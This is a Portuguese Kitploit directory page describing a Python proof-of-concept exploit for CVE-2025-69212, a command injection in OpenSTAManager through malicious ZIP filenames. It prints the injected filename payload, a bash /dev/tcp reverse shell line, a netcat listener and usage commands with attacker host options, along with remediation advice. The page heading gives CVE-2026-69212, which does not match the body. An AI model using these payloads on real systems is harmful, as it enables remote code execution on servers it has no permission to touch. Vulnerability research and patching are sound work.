Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-69212 — Python poc, exploit for CVE-2025-69212 | Kitploit
Ferramentas/GitHubGitHub/c0gnit00/cve-2026-69212
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingCommand and ControlPayload Development
GitHubc0gnit00/cve-2026-69212

CVE-2026-69212

Python poc, exploit for CVE-2025-69212

Ver Repositório
2há 1 mêsAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2025-69212 — Injeção de Comandos do SO no OpenSTAManager (RCE)

Exploit de prova de conceito para CVE-2025-69212, uma vulnerabilidade de Injeção de Comandos do SO no OpenSTAManager <= 2.9.8 que permite a um atacante autenticado executar código remotamente via um upload de arquivo ZIP maliciosamente criado.

Aviso

  • CVE: CVE-2025-69212
  • GHSA: GHSA-25fp-8w8p-mx36
  • Versões afetadas: OpenSTAManager <= 2.9.8
  • Corrigido em: OpenSTAManager 2.9.9+
  • CVSS: Crítico

Detalhes da Vulnerabilidade

A vulnerabilidade existe em src/Util/XML.php na linha ~100, onde a aplicação passa um nome de arquivo controlado pelo usuário diretamente para uma chamada exec() do shell sem sanitização:

root@kitploit:~
exec('openssl smime -verify -noverify -in "' . $file . '" -inform DER -out "' . $output_file . '"');

Quando um arquivo ZIP é enviado via o plugin importFE_ZIP (/actions.php), a aplicação extrai o ZIP e passa o nome de cada entrada .p7m para exec(). Um atacante pode criar um ZIP com um nome de arquivo malicioso que escapa do argumento entre aspas duplas e injeta comandos arbitrários no shell.

Payload de injeção (nome do arquivo):

root@kitploit:~
invoice.p7m";<COMMAND>;echo ".p7m

Execução resultante do shell:

root@kitploit:~
openssl smime ... -in "invoice.p7m";<COMMAND>;echo ".p7m" ...
#                                   ^^^^^^^^^^^^ injetado aqui

Nota: A barra / não pode aparecer diretamente no nome do arquivo porque ZipArchive::extractTo() a trata como um separador de caminho. O PoC evita isso codificando o payload do reverse shell em base64.


Requisitos

  • Python 3.x
  • Biblioteca requests
  • Credenciais válidas do OpenSTAManager (qualquer função com acesso ao plugin de importação)
  • Um listener na máquina atacante (ex.: nc)

Instalar dependências:

root@kitploit:~
pip install requests

Uso

root@kitploit:~
python3 CVE-2025-69212.py -u <TARGET_URL> -U <USERNAME> -P <PASSWORD> --lhost <YOUR_IP> --lport <YOUR_PORT>

Opções

Exemplo

root@kitploit:~
# Start listener
nc -lvnp 4444

# Run exploit
python3 CVE-2025-69212.py -u http://target.htb -U admin -P 'password' --lhost 10.10.14.5 --lport 4444

# Route through Burp Suite
python3 CVE-2025-69212.py -u http://target.htb -U admin -P 'password' --lhost 10.10.14.5 --lport 4444 --proxy http://127.0.0.1:8080

Como Funciona

  1. Autenticação — Faz login no OpenSTAManager usando as credenciais fornecidas
  2. Construção do payload — Cria um arquivo ZIP contendo um arquivo .p7m cujo nome inclui o comando injetado
  3. Codificação Base64 — O reverse shell (bash -i >& /dev/tcp/LHOST/LPORT 0>&1) é codificado em base64 para evitar barras no nome do arquivo
  4. Upload — Envia o ZIP para /actions.php via o plugin importFE_ZIP
  5. Execução — O servidor extrai o ZIP, passa o nome malicioso para exec(), disparando o reverse shell
  6. Threading — O upload é executado em uma thread daemon, pois o bash mantém a conexão HTTP aberta; o script finaliza de forma limpa sem aguardar resposta

Remediação

Atualize para OpenSTAManager 2.9.9 ou superior, que sanitiza os nomes de arquivo antes de passá-los para comandos de shell.

Se não for possível aplicar o patch imediatamente, desabilite o plugin importFE_ZIP ou restrinja o acesso a /actions.php apenas a usuários confiáveis.


Aviso de Isenção de Responsabilidade

Esta ferramenta é destinada apenas para testes de segurança autorizados e fins educacionais. Use apenas em sistemas que você possui ou para os quais tenha permissão explícita por escrito para testar. O uso não autorizado contra sistemas que você não possui é ilegal e antiético. O autor não se responsabiliza por qualquer uso indevido ou dano causado por esta ferramenta.


Referências

  • GHSA-25fp-8w8p-mx36
  • OpenSTAManager GitHub
  • NVD - CVE-2025-69212
Baixar ferramenta
ArgumentoObrigatórioDescrição
-u, --urlSimURL base do alvo (ex.: http://target.htb)
-U, --usernameSimNome de usuário do OpenSTAManager
-P, --passwordSimSenha do OpenSTAManager
--lhostSimSeu endereço IP para o reverse shell
--lportSimSua porta de escuta para o reverse shell
--proxyNãoProxy HTTP (ex.: http://127.0.0.1:8080)